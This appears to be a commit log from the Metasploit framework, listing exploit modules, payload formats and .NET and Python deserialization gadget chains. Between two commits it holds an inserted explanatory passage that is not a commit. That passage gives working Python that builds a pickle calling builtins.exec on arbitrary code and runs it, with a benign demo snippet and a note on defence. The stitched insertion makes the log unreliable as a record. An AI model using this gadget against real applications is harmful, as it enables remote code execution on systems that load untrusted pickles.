sjanusz-r7
1140efc8b4
Support adding encrypted files to archives & jars
2023-10-13 14:42:10 +01:00
Spencer McIntyre
05dd2e1473
Land #18351, Apache Superset RCE (CVE-2023-37941)
2023-10-12 17:10:10 -04:00
Spencer McIntyre
59da2865d9
Use an exec-in-place gadget for Python
This adds a Python deserialization gadget that will exec arbitrary
Python code in place. It is only compatible with Python 3.x due to
differences in Python's exec function and statement between 2 and 3.
2023-10-10 14:01:24 -04:00
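To make the gadget described in the commit above concrete, here is an added example (my own illustration, not Metasploit's code, which builds the byte stream in Ruby and may lay the opcodes out differently). It hand-assembles a protocol-0 pickle whose REDUCE opcode calls `builtins.exec` on an attacker-supplied source string, then unpickles it the way a vulnerable consumer would. The helper names, the environment-variable marker and the sample snippet are all constructed for this demo.

```python
import os
import pickle
from typing import Optional

# Constructed marker, used only so the demo can observe that the exec'd code ran.
MARKER_ENV = "EXEC_GADGET_DEMO"


def build_exec_gadget(code: str) -> bytes:
    """Build a protocol-0 pickle that calls builtins.exec(code) when loaded.

    Opcode stream (assumed layout for this demo):
        c builtins\\n exec\\n   GLOBAL   -> push builtins.exec
        (                      MARK
        V <code>\\n            UNICODE  -> push the source string
        t                      TUPLE    -> (code,)
        R                      REDUCE   -> exec(code)
        .                      STOP

    Python 3 only: in Python 2 'exec' is a statement, so there is no
    builtins.exec (or __builtin__.exec) function for GLOBAL to resolve,
    which is why the commit notes the 2/3 incompatibility.
    """
    # The V opcode reads a single line and decodes it as raw-unicode-escape,
    # so embedded newlines must be escaped as \u000a to survive the line read.
    # (Backslashes inside the code would need the same care; the sample has none.)
    encoded = code.encode("raw_unicode_escape").replace(b"\n", b"\\u000a")
    return b"cbuiltins\nexec\n(V" + encoded + b"\ntR."


def run_gadget(payload: bytes) -> Optional[str]:
    """Unpickle the payload as a naive consumer would and return the marker value."""
    os.environ.pop(MARKER_ENV, None)
    pickle.loads(payload)  # exec() runs here, during unpickling, before any app code
    return os.environ.get(MARKER_ENV)


if __name__ == "__main__":
    # Constructed, benign multi-line snippet so the newline escaping is exercised.
    src = "import os\nos.environ['EXEC_GADGET_DEMO'] = 'ran'\n"
    payload = build_exec_gadget(src)
    print(payload)
    print("marker after load:", run_gadget(payload))
```

Because the code executes during `pickle.loads` itself, the defence is never a post-load check; the only safe options are not unpickling untrusted bytes at all, or a restricted `Unpickler.find_class` that refuses `builtins`.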
h00die
d64ed33cdf
code spell for a bunch of modules
2023-09-24 17:42:00 -04:00
adfoster-r7
9a40e2612b
Land #17129, Add OSX Aarch64 Payload support
2023-08-02 18:37:56 +01:00
cgranleese-r7
8e0a909b18
Fixes incorrect usage of pack/unpack directives
2023-07-19 11:39:00 +01:00
adfoster-r7
085943bd78
Add Ruby 3.3.0-preview1 to test suite
2023-06-29 22:53:17 +01:00
usiegl00
e70bdb028a
Basic MachO Signing
This commit adds the sign method to Payload::MachO which performs a
basic SHA256 signature update on the provided macho to enable it to run
under osx aarch64 systems.
2023-06-19 10:57:37 +02:00
usiegl00
658c87996d
Hotwire MachO Signing
This commit hotwires in executable signing to some of the aarch64 osx
payloads in order to ensure that they are fully functional.
2023-06-19 10:57:37 +02:00
usiegl00
8a5442f7f0
Fix AARCH64 MachO Generation
This updates the exe util to properly generate stageless aarch64 macho
payloads. I've also added comments on how to assemble the aarch64
stages.
2023-06-19 10:57:37 +02:00
usiegl00
5f8767f4cf
M1ssion Dyld Mettle: Aarch64 Payloads
This builds on Back from the dyld by adding the required aarch64
assembly code to enable the OSX loader to run on the m1. This enables
the use of native payloads on M1 or M2 devices that do not have Rosetta
installed.
2023-06-19 10:57:37 +02:00
Spencer McIntyre
c41483250f
Fix an edge case in .to_win32pe
When the entry point is after the payload, there would occasionally be
cases where `poff` and `eidx` would be invalid, causing `entry` to be
truncated. `poff` should never be negative and `eidx` should reserve the
256 bytes that `entry` may occupy.
2023-06-13 13:41:47 -04:00
space-r7
f9c6caa804
Land #17785, add SolarWinds (SWIS) deser RCE
2023-03-27 15:25:17 -05:00
Spencer McIntyre
bfac7e6e0b
Add a formatter_compatible_gadget_chains function
2023-03-23 17:28:58 -04:00
Spencer McIntyre
ff3b68a352
Add the ObjectDataProvider+JsonNetFormatter
2023-03-23 17:28:58 -04:00
adfoster-r7
236de61130
Land #17583, Enhances info -d with references to AttackerKB
2023-03-21 12:38:36 +00:00
bcoles
9dcaf93b29
Replace deprecated File.exists? with File.exist?
2023-03-05 14:30:47 +11:00
Grant Willcox
e7da4c4612
Land #17594, Add larger DLL templates
2023-02-15 19:35:37 -06:00
Spencer McIntyre
301d25ddfa
Raise more explicit errors for invalid arguments
2023-02-15 09:07:01 -05:00
Spencer McIntyre
5725dd2ded
Fix an off by one size error
2023-02-14 18:01:14 -05:00
Spencer McIntyre
ac9d60ce9e
Land #17281, Added module for CVE-2022-2992
Added module for CVE-2022-2992 - Gitlab Remote Command Execution via Github import
2023-02-14 16:57:29 -05:00
Spencer McIntyre
fd6cd82f30
Upgrade DLL template size automatically
2023-02-09 15:09:50 -05:00
cgranleese-r7
b789e00ea7
Enhances info -d with references to AttackerKB
2023-02-03 10:15:55 +00:00
Grant Willcox
6043d0ffba
Update all links from Wiki site to new docs site.
2023-01-27 09:58:53 -06:00
adfoster-r7
2783e92203
Update windows_secrets_dump and Keytab module to export kerberos keys
2022-12-14 13:40:39 +00:00
Heyder Andrade
cf6d5d3a14
It made the gadgets being used more readable
2022-12-06 17:47:49 +01:00
Heyder Andrade
704cee436b
Apply suggestions from code review
2022-11-29 15:25:14 +01:00
Heyder Andrade
c1236500f1
Apply suggestions from code review
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2022-11-29 14:12:39 +01:00
h00die
637ad5f809
make ducky more psh friendly
2022-11-21 17:55:48 -05:00
Heyder Andrade
34d191b06c
Added Ruby serialized payload generator
2022-11-19 15:20:49 +01:00
h00die
29b7fa5336
ducky_script format for msfvenom
2022-11-18 17:02:52 -05:00
adfoster-r7
0d9cca79b4
Fix crash when generating payload sizes
2022-11-04 02:10:58 +00:00
Grant Willcox
97bce45e69
Land #16915, Add exploit for CVE-2022-23277 (Exchange RCE)
2022-08-19 11:11:46 -05:00
Spencer McIntyre
7c1dd17c86
Add a missing version, fix typos
2022-08-17 17:36:31 -04:00
Spencer McIntyre
5faee26f10
Add the DataSetTypeSpoof .NET deserialization chain
2022-08-08 17:52:51 -04:00
Spencer McIntyre
852fac48b1
Add the DataSet .NET deserialization chain
2022-08-08 17:51:37 -04:00
Spencer McIntyre
310cfde62b
Fix a bug with empty length-prefixed strings
2022-08-08 15:14:17 -04:00
Spencer McIntyre
a415a86c11
Fix a bug caused by ClassTypeInfo additional info
The ClassTypeInfo does not have a #value method that returns a scalar,
switch to using snapshot instead.
2022-08-03 16:38:43 -04:00
Spencer McIntyre
56d1225900
Add the ArraySinglePrimitive data type
2022-08-03 16:38:29 -04:00
adfoster-r7
f65119b353
Support OpenSSL3 and run Ubuntu 22.04 in test matrix
2022-08-03 15:49:53 +01:00
adfoster-r7
9f6950c6c8
Ensure HTML is escaped in markdown codeblocks
2022-04-27 19:51:05 +01:00
sjanusz
bbf9e3163a
Fix file reads on Windows for binary files
2022-03-21 12:47:39 +00:00
Spencer McIntyre
a6a63d0895
Rename scope to zone_id
2022-03-15 11:14:41 -04:00
Spencer McIntyre
71cacc4cc2
Catch SocketError when normalizing the hostname
2022-03-14 17:09:37 -04:00
Spencer McIntyre
6be3443680
Land #16103, LPE in polkit's pkexec (CVE-2021-4034)
2022-03-03 09:24:11 -05:00
bwatters
c9408c7b1b
Remove pointless format string
2022-03-03 06:40:26 -06:00
bwatters
5246e9cb7e
Add rescue for failed authentication on info -d
2022-03-02 16:41:19 -06:00
bwatters
06e897436c
Add Fedora results to docs and some minor final cleanup
2022-03-02 09:12:01 -06:00
bwatters
9635fde12d
Add support and templates for aarch64 targets
2022-02-10 10:49:02 -06:00
Spencer McIntyre
e6c1d20c5d
Add the ClaimsPrincipal .NET gadget chain
2022-02-09 14:38:51 -05:00